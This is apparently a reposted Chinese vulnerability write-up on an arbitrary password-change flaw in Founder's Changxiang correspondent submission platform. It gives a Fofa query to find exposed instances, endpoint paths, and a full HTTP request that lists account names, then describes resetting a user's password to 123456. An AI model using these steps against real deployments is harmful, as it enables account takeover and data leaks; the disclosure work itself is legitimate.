畅享通讯员投稿平台 UpdatePwdSuccess.do 任意用户密码修改漏洞（附edusrc邀请码）

admin

103496
文章

87
评论

2024年4月28日11:39:49评论41 views字数 880阅读2分56秒阅读模式

0x01 前言

北京北大方正电子有限公司开发的畅享通讯员投稿平台存在任意用户重置密码漏洞，攻击者可以跳过忘记密码的问题验证过程直接修改用户密码，造成平台的数据泄露。

0x02 影响平台

 畅享通讯员投稿平台

0x03 漏洞复现

Fofa: app="FOUNDER-全媒体采编系统"

访问投稿平台：/newsedit/newsedit/batman/BatmanLogin.do

畅享通讯员投稿平台 UpdatePwdSuccess.do 任意用户密码修改漏洞（附edusrc邀请码）

访问：/newsedit/newsedit/batman/getPublishTop.do获取账号

GET /newsedit/newsedit/batman/getPublishTop.do HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 Edg/124.0.0.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6Connection: close

畅享通讯员投稿平台 UpdatePwdSuccess.do 任意用户密码修改漏洞（附edusrc邀请码）

构造重置zhangsan账号密码为123456的数据包

畅享通讯员投稿平台 UpdatePwdSuccess.do 任意用户密码修改漏洞（附edusrc邀请码）

登录口令：zhangsan/123456

畅享通讯员投稿平台 UpdatePwdSuccess.do 任意用户密码修改漏洞（附edusrc邀请码）

0x04 修复建议

关注厂商更新产品：https://www.founder.com.cn/

0x05 参考链接

https://mp.weixin.qq.com/s/U2-A05cA8_0ePGIySPPyZw

原文始发于微信公众号（SheYin）：畅享通讯员投稿平台 UpdatePwdSuccess.do 任意用户密码修改漏洞（附edusrc邀请码）

左青龙
微信扫一扫

右白虎
微信扫一扫

畅享通讯员投稿平台 UpdatePwdSuccess.do 任意用户密码修改漏洞（附edusrc邀请码）

CVE-2024-21006 Oracle WebLogic Server RCE POC

【漏洞预警】OpenMetadata SPEL注入漏洞 (CVE-2024-28847)

叮～你有新的速递！CNVD-2024-02175 RCE漏洞（附EXP）

漏洞复现 | 图书馆集群管理系统interlib updOpuserPw SQL注入漏洞【附poc】

【高危漏洞】锐捷统一上网行为管理与审计系统存在命令执行漏洞

CVE-2024-32399｜RaidenMAILD Mail Server路径遍历漏洞（POC）

CVE-2024-34351｜Next.js框架存在SSRF漏洞

CVE-2024-21793｜F5 BIG-IP Next Central Manager存在多个安全漏洞（POC）

工具 | 禅道最新身份认证绕过漏洞利用

CVE-2024-2389命令执行漏洞 (附EXP)

发表评论

在线咨询

微信